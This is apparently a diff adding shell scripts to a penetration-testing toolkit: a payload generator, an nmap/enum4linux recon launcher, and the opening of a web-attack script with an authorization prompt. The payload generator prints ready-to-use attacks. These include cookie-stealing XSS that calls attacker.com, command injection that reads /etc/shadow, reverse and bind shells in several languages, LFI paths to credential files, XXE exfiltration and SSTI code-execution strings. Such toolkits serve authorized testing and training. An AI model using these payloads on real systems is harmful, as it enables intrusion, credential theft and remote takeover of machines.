'><script>alert(1)</script>
|
||||
" onclick=alert(1)//
|
||||
' onclick=alert(1)//
|
||||
EOF
|
||||
;;
|
||||
stored)
|
||||
cat << 'EOF'
|
||||
# Stored XSS (persistent)
|
||||
<script>fetch('http://attacker.com/?c='+document.cookie)</script>
|
||||
<img src=x onerror="fetch('http://attacker.com/?c='+document.cookie)">
|
||||
<script>new Image().src='http://attacker.com/?c='+document.cookie</script>
|
||||
<script>document.location='http://attacker.com/?c='+document.cookie</script>
|
||||
|
||||
# With common filters bypassed
|
||||
<ScRiPt>alert(1)</sCrIpT>
|
||||
<script>alert(String.fromCharCode(88,83,83))</script>
|
||||
<iframe src="data:text/html,<script>alert(1)</script>">
|
||||
EOF
|
||||
;;
|
||||
dom)
|
||||
cat << 'EOF'
|
||||
# DOM-based XSS
|
||||
#<script>alert(1)</script>
|
||||
#<img src=x onerror=alert(1)>
|
||||
javascript:alert(1)
|
||||
javascript:alert(document.domain)
|
||||
javascript:alert(document.cookie)
|
||||
|
||||
# Hash-based
|
||||
http://vulnerable.com/#<script>alert(1)</script>
|
||||
http://vulnerable.com/#<img src=x onerror=alert(1)>
|
||||
EOF
|
||||
;;
|
||||
*)
|
||||
echo -e "${RED}Unknown XSS variant:${NC} $variant"
|
||||
echo "Available: basic, reflected, stored, dom"
|
||||
return 1
|
||||
;;
|
||||
esac
|
||||
}
|
||||
|
||||
# Command Injection Payloads
|
||||
generate_cmd() {
|
||||
local variant="${1:-linux}"
|
||||
|
||||
case "$variant" in
|
||||
linux)
|
||||
cat << 'EOF'
|
||||
# Linux Command Injection
|
||||
; whoami
|
||||
| whoami
|
||||
|| whoami
|
||||
& whoami
|
||||
&& whoami
|
||||
; id
|
||||
| id
|
||||
`whoami`
|
||||
$(whoami)
|
||||
;ls -la
|
||||
|ls -la
|
||||
`ls -la`
|
||||
$(ls -la)
|
||||
|
||||
# With common filters
|
||||
;wh''oami
|
||||
;who$()ami
|
||||
;who\ami
|
||||
`wh''oami`
|
||||
$(wh''oami)
|
||||
|
||||
# Chaining
|
||||
; cat /etc/passwd
|
||||
| cat /etc/passwd
|
||||
; cat /etc/shadow
|
||||
EOF
|
||||
;;
|
||||
windows)
|
||||
cat << 'EOF'
|
||||
# Windows Command Injection
|
||||
& whoami
|
||||
&& whoami
|
||||
| whoami
|
||||
|| whoami
|
||||
; whoami
|
||||
%0a whoami
|
||||
` whoami `
|
||||
|
||||
# PowerShell
|
||||
; powershell -c whoami
|
||||
| powershell -c whoami
|
||||
& powershell -c Get-Process
|
||||
|
||||
# CMD
|
||||
& dir
|
||||
&& dir c:\
|
||||
| type c:\windows\win.ini
|
||||
EOF
|
||||
;;
|
||||
*)
|
||||
echo -e "${RED}Unknown command injection variant:${NC} $variant"
|
||||
echo "Available: linux, windows"
|
||||
return 1
|
||||
;;
|
||||
esac
|
||||
}
|
||||
|
||||
# Reverse Shell Payloads
|
||||
generate_shell() {
|
||||
local variant="${1:-reverse}"
|
||||
local lhost="${2:-10.10.14.5}"
|
||||
local lport="${3:-4444}"
|
||||
|
||||
case "$variant" in
|
||||
reverse)
|
||||
cat << EOF
|
||||
# Bash Reverse Shells
|
||||
bash -i >& /dev/tcp/$lhost/$lport 0>&1
|
||||
bash -c 'bash -i >& /dev/tcp/$lhost/$lport 0>&1'
|
||||
0<&196;exec 196<>/dev/tcp/$lhost/$lport; sh <&196 >&196 2>&196
|
||||
|
||||
# Netcat Reverse Shells
|
||||
nc -e /bin/sh $lhost $lport
|
||||
nc -e /bin/bash $lhost $lport
|
||||
nc -c bash $lhost $lport
|
||||
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $lhost $lport >/tmp/f
|
||||
|
||||
# Python Reverse Shells
|
||||
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$lhost",$lport));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
|
||||
|
||||
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$lhost",$lport));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
|
||||
|
||||
# PHP Reverse Shell
|
||||
php -r '\$sock=fsockopen("$lhost",$lport);exec("/bin/sh -i <&3 >&3 2>&3");'
|
||||
|
||||
# Perl Reverse Shell
|
||||
perl -e 'use Socket;\$i="$lhost";\$p=$lport;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
|
||||
|
||||
# Ruby Reverse Shell
|
||||
ruby -rsocket -e'f=TCPSocket.open("$lhost",$lport).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
|
||||
EOF
|
||||
;;
|
||||
bind)
|
||||
cat << EOF
|
||||
# Bind Shells (listen on target)
|
||||
nc -lvnp $lport -e /bin/bash
|
||||
nc -lvp $lport -e /bin/sh
|
||||
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp $lport >/tmp/f
|
||||
|
||||
# Python Bind Shell
|
||||
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind(("0.0.0.0",$lport));s.listen(1);conn,addr=s.accept();os.dup2(conn.fileno(),0);os.dup2(conn.fileno(),1);os.dup2(conn.fileno(),2);subprocess.call(["/bin/sh","-i"])'
|
||||
EOF
|
||||
;;
|
||||
*)
|
||||
echo -e "${RED}Unknown shell variant:${NC} $variant"
|
||||
echo "Available: reverse, bind"
|
||||
return 1
|
||||
;;
|
||||
esac
|
||||
}
|
||||
|
||||
# LFI Payloads
|
||||
generate_lfi() {
|
||||
local variant="${1:-linux}"
|
||||
|
||||
case "$variant" in
|
||||
linux)
|
||||
cat << 'EOF'
|
||||
# Basic LFI
|
||||
/etc/passwd
|
||||
../etc/passwd
|
||||
../../etc/passwd
|
||||
../../../etc/passwd
|
||||
../../../../etc/passwd
|
||||
../../../../../etc/passwd
|
||||
|
||||
# Interesting Linux files
|
||||
/etc/shadow
|
||||
/etc/group
|
||||
/etc/hosts
|
||||
/etc/motd
|
||||
/etc/issue
|
||||
/proc/self/environ
|
||||
/proc/version
|
||||
/proc/cmdline
|
||||
/var/log/apache2/access.log
|
||||
/var/log/apache2/error.log
|
||||
/var/log/auth.log
|
||||
/var/log/syslog
|
||||
|
||||
# PHP wrappers
|
||||
php://filter/convert.base64-encode/resource=/etc/passwd
|
||||
php://filter/read=string.rot13/resource=/etc/passwd
|
||||
expect://whoami
|
||||
data://text/plain,<?php system($_GET['cmd']);?>
|
||||
EOF
|
||||
;;
|
||||
windows)
|
||||
cat << 'EOF'
|
||||
# Windows LFI
|
||||
C:\Windows\System32\drivers\etc\hosts
|
||||
C:\Windows\win.ini
|
||||
C:\Windows\system.ini
|
||||
C:\Windows\System32\config\SAM
|
||||
C:\Windows\System32\config\SYSTEM
|
||||
C:\Windows\repair\SAM
|
||||
C:\Windows\repair\SYSTEM
|
||||
C:\inetpub\wwwroot\web.config
|
||||
|
||||
# Path traversal
|
||||
..\..\..\Windows\System32\drivers\etc\hosts
|
||||
..\..\..\..\Windows\win.ini
|
||||
EOF
|
||||
;;
|
||||
*)
|
||||
echo -e "${RED}Unknown LFI variant:${NC} $variant"
|
||||
echo "Available: linux, windows"
|
||||
return 1
|
||||
;;
|
||||
esac
|
||||
}
|
||||
|
||||
# XXE Payloads
|
||||
generate_xxe() {
|
||||
cat << 'EOF'
|
||||
# Basic XXE
|
||||
<?xml version="1.0"?>
|
||||
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
|
||||
<foo>&xxe;</foo>
|
||||
|
||||
# XXE with external DTD
|
||||
<?xml version="1.0"?>
|
||||
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd"> %xxe;]>
|
||||
<foo>&exfil;</foo>
|
||||
|
||||
# Blind XXE
|
||||
<?xml version="1.0"?>
|
||||
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "file:///etc/passwd">
|
||||
<!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
|
||||
%dtd;]>
|
||||
|
||||
# XXE OOB data exfiltration
|
||||
<?xml version="1.0"?>
|
||||
<!DOCTYPE foo [
|
||||
<!ENTITY % file SYSTEM "file:///etc/passwd">
|
||||
<!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
|
||||
%dtd;]>
|
||||
EOF
|
||||
}
|
||||
|
||||
# SSTI Payloads
|
||||
generate_ssti() {
|
||||
cat << 'EOF'
|
||||
# Jinja2 (Python/Flask)
|
||||
{{7*7}}
|
||||
{{config}}
|
||||
{{config.items()}}
|
||||
{{''.__class__.__mro__[2].__subclasses__()}}
|
||||
{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}
|
||||
|
||||
# Twig (PHP)
|
||||
{{7*7}}
|
||||
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
|
||||
|
||||
# Freemarker (Java)
|
||||
${7*7}
|
||||
<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("id") }
|
||||
|
||||
# Thymeleaf (Java)
|
||||
${7*7}
|
||||
${T(java.lang.Runtime).getRuntime().exec('id')}
|
||||
|
||||
# Velocity (Java)
|
||||
#set($str=$class.inspect("java.lang.String").type)
|
||||
#set($chr=$class.inspect("java.lang.Character").type)
|
||||
#set($ex=$class.inspect("java.lang.Runtime").type.getRuntime().exec("id"))
|
||||
EOF
|
||||
}
|
||||
|
||||
# List all payloads
|
||||
list_payloads() {
|
||||
echo -e "${BOLD}${CYAN}Available Payload Types:${NC}"
|
||||
echo
|
||||
echo -e "${YELLOW}SQL Injection:${NC}"
|
||||
echo " payload sql basic - Basic SQL injection"
|
||||
echo " payload sql auth-bypass - Authentication bypass"
|
||||
echo " payload sql union - UNION-based injection"
|
||||
echo
|
||||
echo -e "${YELLOW}Cross-Site Scripting (XSS):${NC}"
|
||||
echo " payload xss basic - Basic XSS payloads"
|
||||
echo " payload xss reflected - Reflected XSS"
|
||||
echo " payload xss stored - Stored/persistent XSS"
|
||||
echo " payload xss dom - DOM-based XSS"
|
||||
echo
|
||||
echo -e "${YELLOW}Command Injection:${NC}"
|
||||
echo " payload cmd linux - Linux command injection"
|
||||
echo " payload cmd windows - Windows command injection"
|
||||
echo
|
||||
echo -e "${YELLOW}Reverse Shells:${NC}"
|
||||
echo " payload shell reverse IP PORT - Reverse shell payloads"
|
||||
echo " payload shell bind PORT - Bind shell payloads"
|
||||
echo
|
||||
echo -e "${YELLOW}File Inclusion:${NC}"
|
||||
echo " payload lfi linux - Linux LFI/path traversal"
|
||||
echo " payload lfi windows - Windows LFI/path traversal"
|
||||
echo
|
||||
echo -e "${YELLOW}Other:${NC}"
|
||||
echo " payload xxe - XML external entity"
|
||||
echo " payload ssti - Server-side template injection"
|
||||
}
|
||||
|
||||
# Main logic
|
||||
if [[ $# -eq 0 ]] || [[ "$1" =~ ^(-h|--help|help)$ ]]; then
|
||||
show_help
|
||||
exit 0
|
||||
fi
|
||||
|
||||
type="$1"
|
||||
shift
|
||||
|
||||
case "$type" in
|
||||
list|ls)
|
||||
list_payloads
|
||||
;;
|
||||
sql)
|
||||
generate_sql "$@"
|
||||
;;
|
||||
xss)
|
||||
generate_xss "$@"
|
||||
;;
|
||||
cmd|command)
|
||||
generate_cmd "$@"
|
||||
;;
|
||||
shell|shells)
|
||||
generate_shell "$@"
|
||||
;;
|
||||
lfi)
|
||||
generate_lfi "$@"
|
||||
;;
|
||||
xxe)
|
||||
generate_xxe
|
||||
;;
|
||||
ssti|template)
|
||||
generate_ssti
|
||||
;;
|
||||
*)
|
||||
echo -e "${RED}Error:${NC} Unknown payload type: $type"
|
||||
echo "Run 'payload list' to see available types"
|
||||
exit 1
|
||||
;;
|
||||
esac
|
||||
196
scripts/pentesting/recon
Executable file
196
scripts/pentesting/recon
Executable file
|
|
@ -0,0 +1,196 @@
|
|||
#!/usr/bin/env bash
|
||||
set -euo pipefail
|
||||
|
||||
# Script Name: recon.sh
|
||||
# Description: Network/host reconnaissance with tmux orchestration
|
||||
# Usage: recon <target>
|
||||
# Creates tmux window with parallel nmap scans and enum4linux
|
||||
|
||||
VERSION="2.0.0"
|
||||
|
||||
# Colors
|
||||
readonly RED='\033[0;31m'
|
||||
readonly GREEN='\033[0;32m'
|
||||
readonly YELLOW='\033[1;33m'
|
||||
readonly BLUE='\033[0;34m'
|
||||
readonly CYAN='\033[0;36m'
|
||||
readonly MAGENTA='\033[0;35m'
|
||||
readonly BOLD='\033[1m'
|
||||
readonly NC='\033[0m'
|
||||
|
||||
# Status indicators
|
||||
readonly GREENPLUS="${GREEN}[+]${NC}"
|
||||
readonly GREENSTAR="${YELLOW}[*]${NC}"
|
||||
readonly REDMINUS="${RED}[-]${NC}"
|
||||
readonly REDEXCLAIM="${RED}[!]${NC}"
|
||||
|
||||
show_help() {
|
||||
echo -e "${BOLD}recon${NC} - Network Reconnaissance Script v${VERSION}"
|
||||
echo
|
||||
echo -e "${BOLD}USAGE:${NC}"
|
||||
echo " recon <target>"
|
||||
echo
|
||||
echo -e "${BOLD}DESCRIPTION:${NC}"
|
||||
echo " Creates tmux window with 3 panes running parallel reconnaissance:"
|
||||
echo " - Pane 1: nmap service scan + version detection"
|
||||
echo " - Pane 2: nmap vulnerability scan + full port scan"
|
||||
echo " - Pane 3: enum4linux-ng (SMB enumeration)"
|
||||
echo
|
||||
echo -e "${BOLD}EXAMPLE:${NC}"
|
||||
echo " recon 10.10.10.5"
|
||||
echo " recon target.htb"
|
||||
echo
|
||||
echo -e "${BOLD}OUTPUT:${NC}"
|
||||
echo " All results saved to: ./recon-<target>-<timestamp>/"
|
||||
}
|
||||
|
||||
# Check required tools
|
||||
check_tools() {
|
||||
local missing=()
|
||||
|
||||
command -v nmap &>/dev/null || missing+=("nmap")
|
||||
command -v tmux &>/dev/null || missing+=("tmux")
|
||||
|
||||
# Optional tools
|
||||
if ! command -v naabu &>/dev/null; then
|
||||
echo -e "${YELLOW}⚠${NC} naabu not found (optional - using pure nmap)"
|
||||
fi
|
||||
|
||||
if ! command -v docker &>/dev/null; then
|
||||
echo -e "${YELLOW}⚠${NC} docker not found (skipping enum4linux-ng)"
|
||||
fi
|
||||
|
||||
if [[ ${#missing[@]} -gt 0 ]]; then
|
||||
echo -e "${RED}Error:${NC} Missing required tools: ${missing[*]}"
|
||||
echo "Install with: sudo apt install ${missing[*]}"
|
||||
exit 1
|
||||
fi
|
||||
}
|
||||
|
||||
# Create output directory
|
||||
setup_output_dir() {
|
||||
local target="$1"
|
||||
local timestamp=$(date +%Y%m%d-%H%M%S)
|
||||
local clean_target=$(echo "$target" | tr '/:' '_')
|
||||
|
||||
OUTPUT_DIR="recon-${clean_target}-${timestamp}"
|
||||
mkdir -p "$OUTPUT_DIR"
|
||||
|
||||
echo -e "${GREEN}✓${NC} Output directory: ${BOLD}$OUTPUT_DIR${NC}"
|
||||
}
|
||||
|
||||
# Main recon function
|
||||
run_recon() {
|
||||
local target="$1"
|
||||
|
||||
echo -e "${CYAN}${BOLD}"
|
||||
echo "╔════════════════════════════════════════════════════════════╗"
|
||||
echo "║ Network Reconnaissance ║"
|
||||
echo "║ Target: $target"
|
||||
echo "╚════════════════════════════════════════════════════════════╝"
|
||||
echo -e "${NC}"
|
||||
|
||||
# Create output directory
|
||||
setup_output_dir "$target"
|
||||
|
||||
# Check if in tmux
|
||||
if [[ -z "${TMUX:-}" ]]; then
|
||||
echo -e "${YELLOW}⚠${NC} Not in tmux session - results will be in terminal"
|
||||
run_scans_sequential "$target"
|
||||
return
|
||||
fi
|
||||
|
||||
# Create tmux window
|
||||
tmux new-window -n "<<Recon: $target>>"
|
||||
|
||||
# Split into 3 panes
|
||||
# Bottom pane (pane 0)
|
||||
tmux split-window -v
|
||||
|
||||
# Top left pane (pane 1)
|
||||
tmux select-pane -t 0
|
||||
tmux split-window -h
|
||||
|
||||
# Top right pane (pane 2)
|
||||
tmux select-pane -t 1
|
||||
tmux split-window -h
|
||||
|
||||
# Pane 0 (bottom): Quick scan + detailed scan
|
||||
tmux select-pane -t 0
|
||||
if command -v naabu &>/dev/null; then
|
||||
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Starting quick port discovery with naabu...${NC}' && naabu -host $target -nmap-cli 'nmap -A -T4 -oA nmap_quick' && echo -e '\n${GREENSTAR} Starting detailed scan...${NC}\n' && naabu -host $target -nmap-cli 'nmap -sV -sC -Pn -oN nmap_detailed'" C-m
|
||||
else
|
||||
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Starting nmap scan...${NC}' && nmap -sV -sC -T4 -oA nmap_quick $target && echo -e '\n${GREENSTAR} Starting detailed scan...${NC}\n' && nmap -sV -sC -Pn -oN nmap_detailed $target" C-m
|
||||
fi
|
||||
|
||||
# Pane 1 (top left): Vulnerability scan + full port scan
|
||||
tmux select-pane -t 1
|
||||
if command -v naabu &>/dev/null; then
|
||||
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Starting vulnerability scan...${NC}' && naabu -host $target -nmap-cli 'nmap --script vuln -Pn -oN nmap_vuln' && echo -e '\n${GREENSTAR} Starting full port scan (all 65535)...${NC}\n' && nmap -p- -T4 $target -oN nmap_fullports" C-m
|
||||
else
|
||||
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Starting vulnerability scan...${NC}' && nmap --script vuln -Pn -oN nmap_vuln $target && echo -e '\n${GREENSTAR} Starting full port scan...${NC}\n' && nmap -p- -T4 $target -oN nmap_fullports" C-m
|
||||
fi
|
||||
|
||||
# Pane 2 (top right): enum4linux-ng
|
||||
tmux select-pane -t 2
|
||||
if command -v docker &>/dev/null; then
|
||||
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Starting enum4linux-ng (SMB enumeration)...${NC}' && docker run --rm -t enum4linux-ng -A -C $target -oY enum4linux-ng.yaml | tee enum4linux-ng.txt" C-m
|
||||
else
|
||||
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${YELLOW}⚠ Docker not available - skipping enum4linux-ng${NC}' && echo 'Install docker to enable SMB enumeration' && sleep 5" C-m
|
||||
fi
|
||||
|
||||
# Focus back on bottom pane
|
||||
tmux select-pane -t 0
|
||||
|
||||
echo
|
||||
echo -e "${GREEN}✓${NC} Tmux recon window created"
|
||||
echo -e "${CYAN}[*]${NC} Switch to window: ${BOLD}<<Recon: $target>>${NC}"
|
||||
echo -e "${CYAN}[*]${NC} Results will be in: ${BOLD}$OUTPUT_DIR${NC}"
|
||||
}
|
||||
|
||||
# Sequential execution (when not in tmux)
|
||||
run_scans_sequential() {
|
||||
local target="$1"
|
||||
|
||||
cd "$OUTPUT_DIR"
|
||||
|
||||
echo -e "\n${GREENSTAR} Running nmap service scan...${NC}"
|
||||
if command -v naabu &>/dev/null; then
|
||||
naabu -host "$target" -nmap-cli 'nmap -sV -sC -T4 -oA nmap_quick'
|
||||
else
|
||||
nmap -sV -sC -T4 -oA nmap_quick "$target"
|
||||
fi
|
||||
|
||||
echo -e "\n${GREENSTAR} Running vulnerability scan...${NC}"
|
||||
nmap --script vuln -Pn -oN nmap_vuln "$target"
|
||||
|
||||
if command -v docker &>/dev/null; then
|
||||
echo -e "\n${GREENSTAR} Running enum4linux-ng...${NC}"
|
||||
docker run --rm -t enum4linux-ng -A -C "$target" -oY enum4linux-ng.yaml | tee enum4linux-ng.txt
|
||||
fi
|
||||
|
||||
cd ..
|
||||
|
||||
echo -e "\n${GREEN}✓${NC} Recon complete! Results in: ${BOLD}$OUTPUT_DIR${NC}"
|
||||
}
|
||||
|
||||
# Parse arguments
|
||||
if [[ $# -eq 0 ]] || [[ "$1" =~ ^(-h|--help|help)$ ]]; then
|
||||
show_help
|
||||
exit 0
|
||||
fi
|
||||
|
||||
target="$1"
|
||||
|
||||
# Validate target
|
||||
if [[ -z "$target" ]]; then
|
||||
echo -e "${RED}Error:${NC} Target required"
|
||||
echo "Usage: recon <target>"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
# Check tools
|
||||
check_tools
|
||||
|
||||
# Run reconnaissance
|
||||
run_recon "$target"
|
||||
460
scripts/pentesting/web-attack
Executable file
460
scripts/pentesting/web-attack
Executable file
|
|
@ -0,0 +1,460 @@
|
|||
#!/usr/bin/env bash
|
||||
set -euo pipefail
|
||||
|
||||
# Script Name: web-attack
|
||||
# Description: Web application OWASP Top 10 exploitation testing
|
||||
# Usage: web-attack <url>
|
||||
|
||||
VERSION="1.0.0"
|
||||
|
||||
# Colors
|
||||
readonly RED='\033[0;31m'
|
||||
readonly GREEN='\033[0;32m'
|
||||
readonly YELLOW='\033[1;33m'
|
||||
readonly BLUE='\033[0;34m'
|
||||
readonly CYAN='\033[0;36m'
|
||||
readonly MAGENTA='\033[0;35m'
|
||||
readonly BOLD='\033[1m'
|
||||
readonly NC='\033[0m'
|
||||
|
||||
# Status indicators
|
||||
readonly GREENPLUS="${GREEN}[+]${NC}"
|
||||
readonly GREENSTAR="${YELLOW}[*]${NC}"
|
||||
readonly REDMINUS="${RED}[-]${NC}"
|
||||
readonly REDEXCLAIM="${RED}[!]${NC}"
|
||||
|
||||
show_help() {
|
||||
echo -e "${BOLD}web-attack${NC} - OWASP Top 10 Exploitation Testing v${VERSION}"
|
||||
echo
|
||||
echo -e "${BOLD}USAGE:${NC}"
|
||||
echo " web-attack <url>"
|
||||
echo
|
||||
echo -e "${BOLD}DESCRIPTION:${NC}"
|
||||
echo " Active exploitation testing for OWASP Top 10 vulnerabilities"
|
||||
echo " Creates tmux window with 6 panes running parallel attacks"
|
||||
echo
|
||||
echo -e "${BOLD}⚠️ AUTHORIZATION REQUIRED ⚠️${NC}"
|
||||
echo -e " ${RED}Only use on:${NC}"
|
||||
echo " ✓ localhost/127.0.0.1 (your own systems)"
|
||||
echo " ✓ Authorized penetration testing targets"
|
||||
echo " ✓ Bug bounty programs (within scope)"
|
||||
echo " ✓ Lab environments (DVWA, Juice Shop, etc.)"
|
||||
echo
|
||||
echo " ✗ NEVER use on unauthorized targets"
|
||||
echo " ✗ Illegal without explicit permission"
|
||||
echo
|
||||
echo -e "${BOLD}TESTS PERFORMED:${NC}"
|
||||
echo " 1. SQL Injection (sqlmap)"
|
||||
echo " 2. XSS Detection (dalfox)"
|
||||
echo " 3. Command Injection (commix)"
|
||||
echo " 4. XXE / SSRF Testing"
|
||||
echo " 5. Authentication Bypass"
|
||||
echo " 6. LFI/RFI Testing"
|
||||
echo
|
||||
echo -e "${BOLD}RECOMMENDED WORKFLOW:${NC}"
|
||||
echo " ${GREEN}1.${NC} Run reconnaissance first:"
|
||||
echo " ${BOLD}web-recon http://localhost:3002${NC}"
|
||||
echo " (Discovers endpoints, forms, parameters)"
|
||||
echo
|
||||
echo " ${GREEN}2.${NC} Then run exploitation:"
|
||||
echo " ${BOLD}web-attack http://localhost:3002${NC}"
|
||||
echo " (Tests discovered attack surface)"
|
||||
echo
|
||||
echo " ${YELLOW}⚠${NC} Running web-attack alone will find fewer vulnerabilities"
|
||||
echo " ${YELLOW}⚠${NC} Tools need discovered endpoints/parameters for best results"
|
||||
echo
|
||||
echo -e "${BOLD}EXAMPLES:${NC}"
|
||||
echo " web-attack http://localhost:3002"
|
||||
echo " web-attack http://localhost:8080 # DVWA"
|
||||
echo
|
||||
echo -e "${BOLD}OUTPUT:${NC}"
|
||||
echo " All results saved to: ./web-attack-<target>-<timestamp>/"
|
||||
echo
|
||||
echo -e "${BOLD}SAFETY FEATURES:${NC}"
|
||||
echo " • Localhost check (warns for non-local targets)"
|
||||
echo " • Rate limiting (--throttle)"
|
||||
echo " • No destructive payloads by default"
|
||||
echo " • PoC-focused (prove vulnerability, don't exploit)"
|
||||
}
|
||||
|
||||
# Authorization check
|
||||
check_authorization() {
|
||||
local url="$1"
|
||||
|
||||
# Extract hostname
|
||||
local hostname=$(echo "$url" | sed -E 's~https?://~~' | cut -d: -f1 | cut -d/ -f1)
|
||||
|
||||
# Check if localhost
|
||||
if [[ "$hostname" =~ ^(localhost|127\\.0\\.0\\.1|0\\.0\\.0\\.0)$ ]]; then
|
||||
echo -e "${GREEN}✓${NC} Target is localhost - authorized"
|
||||
return 0
|
||||
fi
|
||||
|
||||
# Check if HTB/THM/CTF
|
||||
if [[ "$hostname" =~ \\.(htb|thm)$ ]]; then
|
||||
echo -e "${GREEN}✓${NC} Target is CTF platform - authorized"
|
||||
return 0
|
||||
fi
|
||||
|
||||
# Warn for external targets
|
||||
echo -e "${RED}⚠️ WARNING:${NC} Target is NOT localhost!"
|
||||
echo -e "${YELLOW}Target:${NC} $hostname"
|
||||
echo
|
||||
echo -e "${BOLD}Do you have written authorization to test this target?${NC}"
|
||||
echo " • Signed penetration testing agreement?"
|
||||
echo " • Bug bounty program with this target in scope?"
|
||||
echo " • Own the target infrastructure?"
|
||||
echo
|
||||
read -p "Type 'YES' to confirm authorization: " -r confirm
|
||||
|
||||
if [[ "$confirm" != "YES" ]]; then
|
||||
echo -e "${RED}Authorization not confirmed. Exiting.${NC}"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
echo -e "${GREEN}✓${NC} Authorization confirmed by user"
|
||||
}
|
||||
|
||||
# Check required tools
|
||||
check_tools() {
|
||||
local missing=()
|
||||
local optional_missing=()
|
||||
|
||||
# Core tools
|
||||
command -v tmux &>/dev/null || missing+=("tmux")
|
||||
|
||||
# Attack tools (all optional but warn)
|
||||
command -v sqlmap &>/dev/null || optional_missing+=("sqlmap")
|
||||
command -v dalfox &>/dev/null || optional_missing+=("dalfox")
|
||||
command -v nuclei &>/dev/null || optional_missing+=("nuclei")
|
||||
command -v ffuf &>/dev/null || optional_missing+=("ffuf")
|
||||
command -v commix &>/dev/null || optional_missing+=("commix")
|
||||
|
||||
if [[ ${#missing[@]} -gt 0 ]]; then
|
||||
echo -e "${RED}Error:${NC} Missing required tools: ${missing[*]}"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
if [[ ${#optional_missing[@]} -gt 0 ]]; then
|
||||
echo -e "${YELLOW}⚠${NC} Optional tools missing (scans will be skipped): ${optional_missing[*]}"
|
||||
echo -e "${CYAN}Install with:${NC}"
|
||||
for tool in "${optional_missing[@]}"; do
|
||||
case "$tool" in
|
||||
sqlmap) echo " sudo apt install sqlmap (or: pipx install sqlmap-dev)" ;;
|
||||
dalfox) echo " go install github.com/hahwul/dalfox/v2@latest" ;;
|
||||
nuclei) echo " go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest" ;;
|
||||
ffuf) echo " go install github.com/ffuf/ffuf/v2@latest" ;;
|
||||
commix) echo " pipx install commix" ;;
|
||||
esac
|
||||
done
|
||||
echo
|
||||
fi
|
||||
}
|
||||
|
||||
# Create output directory
|
||||
# Find most recent web-recon data for this target
|
||||
find_recon_data() {
|
||||
local url="$1"
|
||||
local clean_url=$(echo "$url" | tr '/:' '_' | tr -d 'http')
|
||||
|
||||
# Look for web-recon directories matching this target (most recent first)
|
||||
local recon_dir=$(ls -dt web-recon-*"${clean_url}"* 2>/dev/null | head -1)
|
||||
|
||||
if [[ -n "$recon_dir" ]] && [[ -f "$recon_dir/urls.txt" ]]; then
|
||||
# Check if recon data is recent (within last 24 hours)
|
||||
local recon_age=$(stat -c %Y "$recon_dir" 2>/dev/null || stat -f %m "$recon_dir" 2>/dev/null)
|
||||
local current_time=$(date +%s)
|
||||
local age_hours=$(( ($current_time - $recon_age) / 3600 ))
|
||||
|
||||
if [[ $age_hours -lt 24 ]]; then
|
||||
echo "$recon_dir"
|
||||
return 0
|
||||
fi
|
||||
fi
|
||||
|
||||
return 1
|
||||
}
|
||||
|
||||
setup_output_dir() {
|
||||
local url="$1"
|
||||
local timestamp=$(date +%Y%m%d-%H%M%S)
|
||||
local clean_url=$(echo "$url" | tr '/:' '_' | tr -d 'http')
|
||||
|
||||
OUTPUT_DIR="web-attack-${clean_url}-${timestamp}"
|
||||
mkdir -p "$OUTPUT_DIR"
|
||||
mkdir -p "$OUTPUT_DIR/sqlmap"
|
||||
mkdir -p "$OUTPUT_DIR/commix"
|
||||
|
||||
echo -e "${GREEN}✓${NC} Output directory: ${BOLD}$OUTPUT_DIR${NC}"
|
||||
|
||||
# Check for recent web-recon data
|
||||
RECON_DIR=$(find_recon_data "$url")
|
||||
if [[ -n "$RECON_DIR" ]]; then
|
||||
echo -e "${CYAN}[*]${NC} Found recent recon data: ${BOLD}$RECON_DIR${NC}"
|
||||
|
||||
# Copy recon URLs for exploitation tools
|
||||
if [[ -f "$RECON_DIR/urls.txt" ]] && [[ -s "$RECON_DIR/urls.txt" ]]; then
|
||||
cp "$RECON_DIR/urls.txt" "$OUTPUT_DIR/recon-urls.txt"
|
||||
local url_count=$(wc -l < "$OUTPUT_DIR/recon-urls.txt")
|
||||
echo -e "${GREEN}✓${NC} Imported ${BOLD}${url_count} URLs${NC} from web-recon for testing"
|
||||
RECON_URLS="$OUTPUT_DIR/recon-urls.txt"
|
||||
fi
|
||||
else
|
||||
echo -e "${YELLOW}⚠${NC} No recent web-recon data - tools will use deep crawl mode"
|
||||
echo -e "${CYAN}Tip:${NC} Run ${BOLD}web-recon $url${NC} first for better results"
|
||||
RECON_URLS=""
|
||||
fi
|
||||
}
|
||||
|
